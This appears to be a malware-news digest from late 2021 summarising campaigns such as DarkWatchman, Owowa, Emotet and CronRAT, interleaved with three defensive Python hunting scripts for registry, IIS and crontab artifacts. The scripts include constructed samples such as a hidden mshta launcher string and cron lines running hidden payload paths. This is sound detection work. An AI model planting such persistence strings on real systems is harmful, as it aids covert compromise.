A new JavaScript-based remote access Trojan (RAT) propagated via a social engineering campaign has been observed employing sneaky "fileless" techniques as part of its detection-evasion methods to elude discovery and analysis. Dubbed DarkWatchman by researchers from Prevailion's Adversarial Counterintelligence Team (PACT), the malware uses a resilient domain generation algorithm (DGA) to identify its command-and-control (C2) infrastructure and utilizes the Windows Registry for all of its storage operations, thereby enabling it to bypass antimalware engines. The RAT "utilizes novel methods for fileless persistence, on-system activity, and dynamic run-time capabilities like self-updating and recompilation," researchers Matt Stafford and Sherman Smith said, adding it "represents an evolution in fileless malware techniques, as it uses the registry for nearly all temporary and permanent storage and therefore never writes anything to disk, allowing it to o ... The Hacker News
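A RAT that keeps its code and state in the registry instead of on disk, as the DarkWatchman entries above describe, leaves one thing a hunter can measure: registry values far larger than any legitimate setting. The script below is an added example written for this page, not Prevailion's detection logic and not a DarkWatchman indicator. It parses the text that `reg export` produces, joins the backslash-continued lines of hex values, flags every value above a size threshold, and uses Shannon entropy to tell a packed or encrypted blob from stored script text. The key paths, value names and value contents are constructed for the demonstration.

```python
import math
import random
import re


def _reg_hex(data, width=25):
    """Format bytes the way reg.exe exports REG_BINARY: 'hex:' plus comma-separated
    bytes, wrapped onto continuation lines that end in a backslash."""
    hexes = [f"{b:02x}" for b in data]
    chunks = [",".join(hexes[i:i + width]) for i in range(0, len(hexes), width)]
    return "hex:" + ",\\\n  ".join(chunks)


def build_sample_reg():
    """Constructed .reg export (not a real DarkWatchman artifact): two ordinary values,
    a 6000-byte pseudo-random blob standing in for an encrypted payload, and a 5800-char
    string standing in for a script body stored in the registry."""
    rng = random.Random(7)
    blob = bytes(rng.getrandbits(8) for _ in range(6000))
    script = "var s=new ActiveXObject('WScript.Shell');s.Run('mshta',0);" * 100
    return "\n".join([
        "Windows Registry Editor Version 5.00",
        "",
        r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
        r'"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
        "",
        r"[HKEY_CURRENT_USER\Software\Contoso\Settings]",
        '"Theme"="dark"',
        '"Blob"=' + _reg_hex(blob),
        '"Script"="' + script + '"',
        "",
    ])


SAMPLE_REG = build_sample_reg()

_VALUE_RE = re.compile(r'^(?:"(.*?)"|(@))=(.*)$')
_HEX_KINDS = {"hex": "REG_BINARY", "hex(2)": "REG_EXPAND_SZ", "hex(7)": "REG_MULTI_SZ"}


def parse_reg_export(text):
    """Yield (key, value_name, kind, data_bytes) for every value in a .reg export."""
    lines = text.splitlines()
    key, i = None, 0
    while i < len(lines):
        line = lines[i].rstrip()
        i += 1
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = _VALUE_RE.match(line)
        if not m or key is None:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        rhs = m.group(3)
        while rhs.endswith("\\") and i < len(lines):  # hex data continues on the next line
            rhs = rhs[:-1] + lines[i].strip()
            i += 1
        if rhs.startswith('"') and rhs.endswith('"'):
            yield key, name, "REG_SZ", rhs[1:-1].encode("utf-8")
        elif rhs.startswith("dword:"):
            yield key, name, "REG_DWORD", bytes.fromhex(rhs[6:])
        elif rhs.startswith("hex"):
            prefix, _, hexpart = rhs.partition(":")
            data = bytes(int(h, 16) for h in hexpart.split(",") if h)
            yield key, name, _HEX_KINDS.get(prefix, prefix), data


def shannon_entropy(data):
    """Bits per byte: close to 8.0 for random or encrypted data, roughly 4 to 5 for ASCII text."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_oversized_values(reg_text, min_size=4096, entropy_cutoff=6.0):
    """Flag values at least min_size bytes long; ordinary settings are far smaller than that."""
    findings = []
    for key, name, kind, data in parse_reg_export(reg_text):
        if len(data) < min_size:
            continue
        ent = shannon_entropy(data)
        label = ("high entropy: packed or encrypted payload?" if ent > entropy_cutoff
                 else "low entropy: stored script or text?")
        findings.append({"key": key, "name": name, "kind": kind, "size": len(data),
                         "entropy": round(ent, 2), "label": label})
    return findings


if __name__ == "__main__":
    for f in find_oversized_values(SAMPLE_REG):
        print(f"{f['key']}\\{f['name']} {f['kind']} {f['size']}B entropy={f['entropy']} {f['label']}")
```

On a live host, feed it the output of `reg export HKCU\Software hkcu.reg /y` (and the HKLM Software hive); `reg export` writes UTF-16 LE with a BOM, so decode the file as `utf-16` before passing it in. The size threshold is a hunting heuristic, not a signature: a few legitimate products store large blobs too, so treat a hit as a pivot to the value's owner key and to the process that wrote it.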
December 16, 2021
Owowa, a malicious IIS Server module used to steal Microsoft Exchange credentials Full Text
Abstract
Threat actors are using a malicious Internet Information Services (IIS) Server module, dubbed Owowa, to steal Microsoft Exchange credentials. Kaspersky researchers spotted malicious actors while deploying a previously undiscovered binary, an Internet...Security Affairs
December 15, 2021
Malicious Exchange Server Module Hoovers Up Outlook Credentials Full Text
Abstract
“Owowa” stealthily lurks on IIS servers, waiting to harvest successful logins when an Outlook Web Access (OWA) authentication request is made.Threatpost
December 15, 2021
Emotet starts dropping Cobalt Strike again for faster attacks Full Text
Abstract
Right in time for the holidays, the notorious Emotet malware is once again directly installing Cobalt Strike beacons for rapid cyberattacks.BleepingComputer
December 14, 2021
Owowa: the add-on that turns your OWA into a credential stealer and remote access panel Full Text
Abstract
Owowa is a C#-based .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange’s Outlook Web Access (OWA) to credential theft and remote access.Kaspersky Labs
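A malicious IIS module like the one described in the three Owowa entries above has to be registered somewhere IIS reads it: `applicationHost.config` for native modules, and either that file or the site's `web.config` for managed .NET modules. The script below is an added example written for this page, not Kaspersky's detection logic and not an Owowa indicator; it parses an IIS configuration and reports native modules loaded from outside the IIS and .NET directories and managed modules whose assembly is not in a short allowlist. The configuration excerpt and every module, assembly and path name in it are constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Constructed applicationHost.config excerpt, not a capture from an Owowa-infected server.
# "CacheHelper" stands in for a native module dropped outside the IIS directories and
# "OwaAuthHelper" for an unexpected managed module bound to the /owa application.
SAMPLE_CONFIG = """<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\\System32\\inetsrv\\loghttp.dll" />
      <add name="ManagedEngine64" image="%windir%\\Microsoft.NET\\Framework64\\v4.0.30319\\webengine4.dll" preCondition="integratedMode,runtimeVersionv4.0,bitness64" />
      <add name="StaticFileModule" image="%windir%\\System32\\inetsrv\\static.dll" />
      <add name="CacheHelper" image="C:\\inetpub\\temp\\cachehelper.dll" />
    </globalModules>
  </system.webServer>
  <location path="Default Web Site/owa">
    <system.webServer>
      <modules>
        <add name="ExchangeSampleModule" type="Microsoft.Exchange.Sample.HttpModule, Microsoft.Exchange.Sample, Version=15.0.0.0" />
        <add name="OwaAuthHelper" type="OwaHelpers.AuthModule, OwaHelpers" />
      </modules>
    </system.webServer>
  </location>
</configuration>
"""

# Where IIS's own native modules live; anything else deserves a look.
TRUSTED_NATIVE_PREFIXES = ("%windir%\\system32\\inetsrv\\", "%windir%\\microsoft.net\\")
# Assembly-name prefixes expected on an Exchange/OWA server; extend for your environment.
TRUSTED_MANAGED_ASSEMBLIES = ("system.web", "microsoft.exchange", "microsoft.web", "microsoft.aspnet")


def assembly_of(type_attr):
    """'Namespace.Type, Assembly, Version=...' -> 'assembly' (lower-cased), or '' if none given."""
    parts = [p.strip() for p in type_attr.split(",")]
    return parts[1].lower() if len(parts) > 1 else ""


def audit_iis_modules(config_xml):
    """Return (scope, module_name, detail) for every module that fails the allowlists.
    scope is 'server' for the global section or the <location path> it is bound to."""
    root = ET.fromstring(config_xml)
    parent = {child: node for node in root.iter() for child in node}  # ElementTree has no parent links
    findings = []
    for ws in root.iter("system.webServer"):
        owner = parent.get(ws)
        scope = owner.get("path", "") if owner is not None and owner.tag == "location" else "server"
        for add in ws.findall("./globalModules/add"):
            image = add.get("image", "")
            if not image.lower().startswith(TRUSTED_NATIVE_PREFIXES):
                findings.append((scope, add.get("name"), f"native module loaded from {image}"))
        for add in ws.findall("./modules/add"):
            type_attr = add.get("type")
            if not type_attr:
                continue  # no type: enables a global module by name, already checked above
            asm = assembly_of(type_attr)
            if not asm.startswith(TRUSTED_MANAGED_ASSEMBLIES):
                findings.append((scope, add.get("name"), f"managed module from assembly '{asm or type_attr}'"))
    return findings


if __name__ == "__main__":
    for scope, name, detail in audit_iis_modules(SAMPLE_CONFIG):
        print(f"[{scope}] {name}: {detail}")
```

Run it against `%windir%\System32\inetsrv\config\applicationHost.config` and against the `web.config` of the OWA and ECP virtual directories, since a managed module can be registered in either. The allowlist is a starting point rather than proof: an implant can be dropped into `inetsrv` or given a Microsoft-looking assembly name, so confirm every module that survives the filter by locating its DLL, checking its Authenticode signature and comparing its hash against the Exchange build you run.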
December 14, 2021
TinyNuke banking malware targets French organizations Full Text
Abstract
The TinyNuke malware is back and is now being used in attacks aimed at French users working in manufacturing, technology, construction, and business services. Proofpoint researchers uncovered a campaign exclusively targeting French entities and organizations...Security Affairs
December 14, 2021
Anubis Android malware returns to target 394 financial apps Full Text
Abstract
The Anubis Android banking malware is now targeting the customers of nearly 400 financial institutions in a new malware campaign.BleepingComputer
December 13, 2021
TinyNuke info-stealing malware is again attacking French users Full Text
Abstract
The info-stealing malware TinyNuke has re-emerged in a new campaign targeting French users with invoice-themed lures in emails sent to corporate addresses and individuals working in manufacturing, technology, construction, and business services.BleepingComputer
December 13, 2021
TinyNuke Banking Malware Resurges with Invoice-themed Malspam Aimed at French Entities Full Text
Abstract
The campaigns use invoice-themed lures to target hundreds of customers of organizations in various industries including manufacturing, technology, construction, and business services.Proof Point
December 13, 2021
Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan Full Text
Abstract
Infection chains associated with the multi-purpose Qakbot malware have been broken down into "distinct building blocks," an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a "customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it." Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon. It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns. First discovered in 2007, the modular malware — like TrickBot — has evolved from its early roots as a banking trojan to become a Swiss Army knife capable of data exfiltration and acting as a delivery mechanism for the second st ... The Hacker News
December 13, 2021
Hancitor maldoc drops via Windows Clipboard Full Text
Abstract
Hancitor, a malware loader that provides Malware-as-a-Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more.McAfee
December 13, 2021
Malicious PyPI packages with over 10,000 downloads taken down Full Text
Abstract
The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have accumulated over 10,000 downloads across PyPI and its mirrors combined, according to the researchers' report.BleepingComputer
December 11, 2021
Microsoft: These are the building blocks of QBot malware attacks Full Text
Abstract
As QBot campaigns increase in size and frequency, researchers are looking into ways to break the trojan's distribution chain and tackle the threat.BleepingComputer
December 10, 2021
Decade-old Modular Banking Trojan Adds Capability of Delivering Ransomware Payloads Full Text
Abstract
Qakbot has in the past year started delivering ransomware and this new business model is making it harder for network defenders to detect what is and isn't a Qakbot attack.ZDNet
December 10, 2021
PHP Re-Infectors – The Malware that Keeps On Giving Full Text
Abstract
Attackers usually replace the index.php with an infected copy of the WordPress index.php file and also add hundreds or thousands of infected .htaccess files throughout the website directories.Sucuri
December 10, 2021
BlackCat ransomware, a very sophisticated malware written in Rust Full Text
Abstract
BlackCat is the first professional ransomware strain that was written in the Rust programming language, researchers reported. Malware researchers from Recorded Future and MalwareHunterTeam discovered ALPHV (aka BlackCat), the first professional...Security Affairs
December 09, 2021
Malicious Notepad++ installers push StrongPity malware Full Text
Abstract
The sophisticated hacking group known as StrongPity is circulating laced Notepad++ installers that infect targets with malware.BleepingComputer
December 9, 2021
Tens of malicious NPM packages caught hijacking Discord servers Full Text
Abstract
Researchers from cybersecurity firm JFrog found 17 malicious packages on the NPM package repository hijacking Discord servers. JFrog researchers have discovered 17 malicious packages in the NPM (Node.js package manager) repository that were developed...Security Affairs
December 8, 2021
Emotet Needs No Intermediate Trojan, Drops Cobalt Strike Beacons Directly Full Text
Abstract
Conventionally, Emotet would install either TrickBot or Qbot on compromised devices. These trojans would eventually install Cobalt Strike. Now, it has changed its tactics.Cyware Alerts - Hacker News
December 8, 2021
Emotet directly drops Cobalt Strike beacons without intermediate Trojans Full Text
Abstract
The Emotet malware continues to evolve, in the latest attacks, it directly installs Cobalt Strike beacons to give the attackers access to the target network. Emotet malware now directly installs Cobalt Strike beacons to give the attackers immediate...Security Affairs
December 07, 2021
Emotet now drops Cobalt Strike, fast forwards ransomware attacks Full Text
Abstract
In a concerning development, the notorious Emotet malware now installs Cobalt Strike beacons directly, giving immediate network access to threat actors and making ransomware attacks imminent.BleepingComputer
December 7, 2021
How DoppelPaymer Hunts & Kills Windows Processes Full Text
Abstract
DoppelPaymer hijacks ProcessHacker and exploits KProcessHacker to kill a list of processes, including both antivirus (AV) and endpoint detection and response (EDR) applications.Crowdstrike
December 6, 2021
Magnat malvertising campaigns spread malicious Chrome extensions, backdoors and info stealers Full Text
Abstract
Experts spotted a series of malvertising campaigns using fake installers of popular apps and games to deliver a backdoor and a malicious Chrome extension. Talos researchers spotted a series of malvertising campaigns using fake installers of popular...Security Affairs
December 6, 2021
Emotet Spreads Again with Fake App Installers Full Text
Abstract
Threat actors behind Emotet are breaking into networks with malicious Windows App Installer packages that imitate Adobe PDF software. The campaign uses stolen reply-chain emails that seem to be a reply to an existing conversation. Once the install button is clicked, the installer downloads ... Read MoreCyware Alerts - Hacker News
December 05, 2021
Malicious Excel XLL add-ins push RedLine password-stealing malware Full Text
Abstract
Cybercriminals are spamming website contact forms and discussion forums to distribute Excel XLL files that download and install the RedLine password and information-stealing malware.BleepingComputer
December 04, 2021
Malicious KMSPico installers steal your cryptocurrency wallets Full Text
Abstract
Threat actors are distributing altered KMSpico installers to infect Windows devices with malware that steals cryptocurrency wallets.BleepingComputer
December 03, 2021
New Malvertising Campaigns Spreading Backdoors, Malicious Chrome Extensions Full Text
Abstract
A series of malicious campaigns have been leveraging fake installers of popular apps and games such as Viber, WeChat, NoxPlayer, and Battlefield as a lure to trick users into downloading a new backdoor and an undocumented malicious Google Chrome extension with the goal of stealing credentials and data stored in the compromised systems as well as maintaining persistent remote access. Cisco Talos attributed the malware payloads to an unknown actor that goes by the alias "magnat," noting that "these two families have been subject to constant development and improvement by their authors." The attacks are believed to have commenced in late 2018, with intermittent activity observed towards the end of 2019 and through early 2020, followed by fresh spikes since April 2021, while mainly singling out users in Canada, followed by the U.S., Australia, Italy, Spain, and Norway. A noteworthy aspect of the intrusions is the use of malvertising as a means to strike individua ... The Hacker News
December 03, 2021
New Payment Data Stealing Malware Hides in Nginx Process on Linux Servers Full Text
Abstract
E-commerce platforms in the U.S., Germany, and France have come under attack from a new form of malware that targets Nginx servers in an attempt to masquerade its presence and slip past detection by security solutions. "This novel code injects itself into a host Nginx application and is nearly invisible," Sansec Threat Research team said in a new report. "The parasite is used to steal data from eCommerce servers, also known as 'server-side Magecart.'" A free and open-source software, Nginx is a web server that can also be used as a reverse proxy, load balancer, mail proxy, and HTTP cache. NginRAT, as the advanced malware is called, works by hijacking a host Nginx application to embed itself into the webserver process. The remote access trojan itself is delivered via CronRAT, another piece of malware the Dutch cybersecurity firm disclosed last week as hiding its malicious payloads in cron jobs scheduled to execute on February 31st, a non-existent ca ... The Hacker News
December 03, 2021
Fake support agents call victims to install Android banking malware Full Text
Abstract
The BRATA Android remote access trojan (RAT) has been spotted in Italy, with threat actors calling victims of SMS attacks to steal their online banking credentials.BleepingComputer
December 2, 2021
Bogus Android App Steals Banking Credentials from Malaysian Individuals Full Text
Abstract
Initially noticed by MalwareHunterTeam and later analyzed by security experts at Cyblis, this application is promoted via numerous bogus or copied websites and social media accounts in order to advertise the malicious APK ‘Cleaning Service Malaysia.’Heimdal Security
December 2, 2021
NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text
Abstract
Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux task scheduling system (cron) on February 31st.Security Affairs
December 02, 2021
Researchers Detail 17 Malicious Frameworks Used to Attack Air-Gapped Networks Full Text
Abstract
Four different malicious frameworks designed to attack air-gapped networks were detected in the first half of 2020 alone, bringing the total number of such toolkits to 17 and offering adversaries a pathway to cyber espionage and exfiltrate classified information. "All frameworks are designed to perform some form of espionage, [and] all the frameworks used USB drives as the physical transmission medium to transfer data in and out of the targeted air-gapped networks," ESET researchers Alexis Dorais-Joncas and Facundo Muñoz said in a comprehensive study of the frameworks. Air-gapping is a network security measure designed to prevent unauthorized access to systems by physically isolating them from other unsecured networks, including local area networks and the public internet. This also implies that the only way to transfer data is by connecting a physical device to it, such as USB drives or external hard disks. Given that the mechanism is one of the most common ways SCAD ... The Hacker News
December 2, 2021
Emotet trojan returned after the takedown: detected in Japan Full Text
Abstract
Emotet trojan is an infection that spreads using phishing email campaigns with malicious attachments. Once the file is dropped on the machine, the malware can steal emails and credentials and run other malware like TrickBot or Qbot, which it delivered in the past.2-Spyware
December 2, 2021
NginRAT – A stealth malware targets e-store hiding on Nginx servers Full Text
Abstract
Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions. Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT,...Security Affairs
December 2, 2021
Magnat campaigns use malvertising to deliver information stealer, backdoor and malicious Chrome extension Full Text
Abstract
This campaign includes a set of malware distribution campaigns that started in late 2018 and have targeted mainly Canada, along with the U.S., Australia and some EU countries.Cisco Talos
December 02, 2021
New malware hides as legit nginx process on e-commerce servers Full Text
Abstract
eCommerce servers are being targeted with remote access malware that hides on Nginx servers in a way that makes it virtually invisible to security solutions.BleepingComputer
December 01, 2021
Emotet now spreads via fake Adobe Windows App Installer packages Full Text
Abstract
The notorious Emotet malware is now distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.BleepingComputer
December 01, 2021
Malicious Android app steals Malaysian bank credentials, MFA codes Full Text
Abstract
A fake Android app is masquerading as a housekeeping service to steal online banking credentials from the customers of eight Malaysian banks.BleepingComputer
November 30, 2021
Finland warns of Flubot malware heavily targeting Android users Full Text
Abstract
Finland's National Cyber Security Centre (NCSC-FI) has issued a "severe alert" to warn of a massive campaign targeting the country's Android users with Flubot banking malware pushed via text messages sent from compromised devices.BleepingComputer
November 30, 2021
4 Android banking trojans were spread via Google Play infecting 300,000+ devices Full Text
Abstract
Experts found four Android banking trojans that were available on the official Google Play Store and that infected more than 300,000 devices. Researchers from ThreatFabric discovered four distinct Android banking trojans that were spread via the official...Security Affairs
November 30, 2021
Android banking malware infects 300,000 Google Play users Full Text
Abstract
Malware campaigns distributing Android trojans that steal online bank credentials have infected almost 300,000 devices through malicious apps pushed via Google's Play Store.BleepingComputer
November 29, 2021
4 Android Banking Trojan Campaigns Targeted Over 300,000 Devices in 2021 Full Text
Abstract
Four different Android banking trojans were spread via the official Google Play Store between August and November 2021, resulting in more than 300,000 infections through various dropper apps that posed as seemingly harmless utility apps to take full control of the infected devices. Designed to deliver Anatsa (aka TeaBot), Alien, ERMAC, and Hydra, cybersecurity firm ThreatFabric said the malware campaigns are not only more refined, but also engineered to have a small malicious footprint, effectively ensuring that the payloads are installed only on smartphone devices from specific regions and preventing the malware from being downloaded during the publishing process. The malicious dropper apps include: Two Factor Authenticator (com.flowdivison); Protection Guard (com.protectionguard.app); QR CreatorScanner (com.ready.qrscanner.mix); Master Scanner Live (com.multifuction.combine.qr); QR Scanner 2021 (com.qr.code.generate); QR Scanner (com.qr.barqr.scangen); PDF Document ... The Hacker News
November 28, 2021
RATDispenser, a new stealthy JavaScript loader used to distribute RATs Full Text
Abstract
RATDispenser is a new stealthy JavaScript loader that is being used to spread multiple remote access trojans (RATs) into the wild. Researchers from the HP Threat Research team have discovered a new stealthy JavaScript loader dubbed RATDispenser that...Security Affairs
November 27, 2021
CronRAT Abuses Linux Task Scheduler to Stay Under the Radar Full Text
Abstract
Security researchers have discovered a Linux-based remote access trojan (RAT) that uses an unusual stealth technique to steal data. It hides in the Linux calendar sub-system as a task that has a nonexistent date viz. February 31. Organizations are suggested to invest more in data protection solutio ... Read MoreCyware Alerts - Hacker News
November 26, 2021
CronRAT: A New Linux Malware That’s Scheduled to Run on February 31st Full Text
Abstract
Researchers have unearthed a new remote access trojan (RAT) for Linux that employs a never-before-seen stealth technique that involves masking its malicious actions by scheduling them for execution on February 31st, a non-existent calendar day. Dubbed CronRAT, the sneaky malware "enables server-side Magecart data theft which bypasses browser-based security solutions," Sansec Threat Research said. The Dutch cybersecurity firm said it found samples of the RAT on several online stores, including an unnamed country's largest outlet. CronRAT's standout feature is its ability to leverage the cron job-scheduler utility for Unix to hide malicious payloads using task names programmed to execute on February 31st. Not only does this allow the malware to evade detection from security software, but it also enables it to launch an array of attack commands that could put Linux eCommerce servers at risk. "The CronRAT adds a number of tasks to crontab with a curious date ... The Hacker News
November 25, 2021
New Linux CronRAT hides in cron jobs to evade detection in Magecart attacks Full Text
Abstract
Security researchers discovered a new Linux RAT, tracked as CronRAT, that hides in scheduled cron jobs to avoid detection. Security researchers from Sansec have discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux...Security Affairs
November 25, 2021
This New Stealthy JavaScript Loader Infecting Computers with Malware Full Text
Abstract
Threat actors have been found using a previously undocumented JavaScript malware strain that functions as a loader to distribute an array of remote access Trojans (RATs) and information stealers. HP Threat Research dubbed the new, evasive loader "RATDispenser," with the malware responsible for deploying at least eight different malware families in 2021. Around 155 samples of this new malware have been discovered, spread across three different variants, hinting that it's under active development. "RATDispenser is used to gain an initial foothold on a system before launching secondary malware that establishes control over the compromised device," security researcher Patrick Schläpfer said. "All the payloads were RATs, designed to steal information and give attackers control over victim devices." As with other attacks of this kind, the starting point of the infection is a phishing email containing a malicious attachment, which masquerades as a text ... The Hacker News
November 25, 2021
New Linux malware hides in cron jobs with invalid dates Full Text
Abstract
Security researchers have discovered a new remote access trojan (RAT) for Linux that keeps an almost invisible profile by hiding in tasks scheduled for execution on a non-existent day, February 31st.BleepingComputer
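The CronRAT entries above all turn on one detail: cron validates each schedule field on its own, so a line scheduled for the 31st of month 2 is accepted and kept in the crontab even though that date never comes, and the payload text rides along in a line nobody expects to run. The script below is an added example written for this page, not Sansec's detection logic and not a CronRAT signature. It parses crontab text, expands the day-of-month and month fields, and reports entries whose date fields cannot match any real calendar day; it also handles the crontab(5) rule that a restricted day-of-week is OR-ed with a restricted day-of-month, which makes "31 2 3" fire on Wednesdays in February rather than never. The crontab content, paths and command names are constructed.

```python
import calendar

# Constructed sample crontab for the demonstration, not a capture of CronRAT. Lines 5-7
# are the suspicious ones: Feb 31 and Feb 30 never occur, and line 7 pairs Feb 31 with
# a weekday, which Vixie cron treats as "either matches".
SAMPLE_CRONTAB = """\
MAILTO=root
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup-check.sh
52 23 31 2 * /var/tmp/.x/payload.sh
15 4 30 feb * /opt/app/report.py
52 23 31 2 3 /dev/shm/.cache/update
0 0 29 2 * /opt/app/leap-day.py
@reboot /usr/sbin/service-start
"""

# Longest possible length of each month; 2024 is a leap year, so Feb 29 counts as a real date.
DAYS_IN_MONTH = {m: calendar.monthrange(2024, m)[1] for m in range(1, 13)}
MONTH_NAMES = {name.lower(): i for i, name in enumerate(calendar.month_abbr) if name}


def _atom(token, names):
    token = token.lower()
    if names and token in names:
        return names[token]
    return int(token)  # raises ValueError for junk; the caller reports it


def expand_field(field, lo, hi, names=None):
    """Expand one cron field ('*', lists, ranges, steps, month names) into the set of
    values it matches. Raises ValueError for values outside lo..hi."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            start, end = _atom(a, names), _atom(b, names)
        else:
            start = _atom(part, names)
            end = hi if step > 1 else start  # "5/2" means 5..hi step 2 in Vixie cron
        if start < lo or end > hi or start > end:
            raise ValueError(f"{field!r} outside {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return values


def find_suspicious_entries(crontab_text, system_format=False):
    """Return (line_no, reason, command) for entries whose day/month fields match no real date.
    system_format=True handles /etc/crontab and /etc/cron.d files, which carry a user column."""
    n_fields = 7 if system_format else 6
    findings = []
    for line_no, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@"):
            continue  # blank, comment, or @reboot-style shortcut with no date fields
        fields = line.split(None, n_fields - 1)
        if len(fields) < n_fields or "=" in fields[0]:
            continue  # VAR=value assignment or malformed line
        dom, mon, dow, command = fields[2], fields[3], fields[4], fields[-1]
        try:
            doms = expand_field(dom, 1, 31)
            months = expand_field(mon, 1, 12, MONTH_NAMES)
        except ValueError as exc:
            findings.append((line_no, f"invalid field: {exc}", command))
            continue
        # The entry can fire on a real date only if some (day, month) pair exists.
        if any(d <= DAYS_IN_MONTH[m] for d in doms for m in months):
            continue
        if dow == "*":
            reason = "day/month never occurs: entry can never fire"
        else:
            reason = "day/month never occurs but day-of-week is set: Vixie cron fires on those weekdays"
        findings.append((line_no, reason, command))
    return findings


if __name__ == "__main__":
    for line_no, reason, command in find_suspicious_entries(SAMPLE_CRONTAB):
        print(f"line {line_no}: {reason}: {command}")
```

Feed it `crontab -l -u <user>` for every account on the host and, with `system_format=True`, `/etc/crontab` and each file in `/etc/cron.d`. A hit means the line was put there to be stored rather than scheduled, so read the command text itself: an entry with a never-matching date is only the container, and whatever launches the stored payload (a separate cron line, a shell profile, or an injected process such as the NginRAT case above) still has to be found.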
November 25, 2021
Emotet’s Infrastructure Witnesses Huge Growth Full Text
Abstract
Upon analyzing Emotet’s code, several researchers confirmed that the malware has been upgraded, along with expansion of its infrastructure, for an improved, secure, and robust operation.Cyware Alerts - Hacker News
November 25, 2021
Discord malware campaign targets crypto and NFT communities Full Text
Abstract
A new malware campaign on Discord uses the Babadeda crypter to hide malware that targets the crypto, NFT, and DeFi communities.BleepingComputer
November 24, 2021
9.3M+ Androids Running ‘Malicious’ Games from Huawei AppGallery
Abstract
A new trojan called Android.Cynos.7.origin, designed to collect Android users’ device data and phone numbers, was found in 190 games installed on over 9M Android devices.Threatpost
November 24, 2021
Stealthy new JavaScript malware infects Windows PCs with RATs
Abstract
A new stealthy JavaScript malware loader named RATDispenser is being used to infect devices with a variety of remote access trojans (RATs) in phishing attacks.BleepingComputer
November 23, 2021
Over 9 Million Android Phones Running Malware Apps from Huawei’s AppGallery
Abstract
At least 9.3 million Android devices have been infected by a new class of malware that disguises itself as dozens of arcade, shooter, and strategy games on Huawei's AppGallery marketplace to steal device information and victims' mobile phone numbers. The mobile campaign was disclosed by researchers from Doctor Web, who classified the trojan as " Android.Cynos.7.origin ," owing to the fact that the malware is a modified version of the Cynos malware. Of the total 190 rogue games identified, some were designed to target Russian-speaking users, while others were aimed at Chinese or international audiences. Once installed, the apps prompted the victims for permission to make and manage phone calls, using the access to harvest their phone numbers along with other device information such as geolocation, mobile network parameters, and system metadata. "At first glance, a mobile phone number leak may seem like an insignificant problem. Yet in reality, it can serioThe Hacker News
November 23, 2021
BazarLoader Adds Compromised Installers, ISO Files to Arrival and Delivery Vectors
Abstract
Apart from compromised installers, the attackers use an ISO file with a Windows link (LNK) and dynamic link library (DLL) payload. The Americas were found to be the most targeted region.Trend Micro
November 23, 2021
Malware is already attempting to exploit new Windows Installer zero-day
Abstract
Vxers are already attempting to use the proof-of-concept exploit code targeting a new Microsoft Windows Installer zero-day publicly disclosed on Sunday. Malware authors are already attempting to use the proof-of-concept exploit code targeting a new Microsoft...Security Affairs
November 23, 2021
Malware now trying to exploit new Windows Installer zero-day
Abstract
Malware creators have already started testing a proof-of-concept exploit targeting a new Microsoft Windows Installer zero-day publicly disclosed by security researcher Abdelhamid Naceri over the weekend.BleepingComputer
November 23, 2021
Python Packages Stealing Discord Tokens and More
Abstract
Package managers are now becoming a common target for cybercriminals to exploit to their advantage. Researchers have discovered 11 malicious Python packages in the PyPI repository stealing Discord access tokens and passwords, and even carrying out dependency confusion attacks. Altogether, they were down ...Cyware Alerts - Hacker News
November 23, 2021
Android.Cynos.7.origin trojan infected +9 million Android devices
Abstract
Researchers spotted dozens of games on Huawei's AppGallery catalog containing the Android.Cynos.7.origin trojan. Researchers from Dr. Web AV discovered 190 games on Huawei's AppGallery catalog (i.e. simulators, platformers, arcades, strategies,...Security Affairs
November 23, 2021
Stealthier Version of BrazKing Android Malware Spotted in the Wild
Abstract
Banking apps from Brazil are being targeted by a more elusive and stealthier version of an Android remote access trojan (RAT) that's capable of carrying out financial fraud attacks by stealing two-factor authentication (2FA) codes and initiating rogue transactions from infected devices to transfer money from victims' accounts to an account operated by the threat actor. IBM X-Force dubbed the revamped banking malware BrazKing , a previous version of which was referred to as PixStealer by Check Point Research. The mobile RAT was first seen around November 2018, according to ThreatFabric. "It turns out that its developers have been working on making the malware more agile than before, moving its core overlay mechanism to pull fake overlay screens from the command-and-control (C2) server in real-time," IBM X-Force researcher Shahar Tavor noted in a technical deep dive published last week. "The malware […] allows the attacker to log keystrokes, extract the paThe Hacker News
November 23, 2021
RATDispenser: Stealthy JavaScript Loader Dispensing RATs into the Wild
Abstract
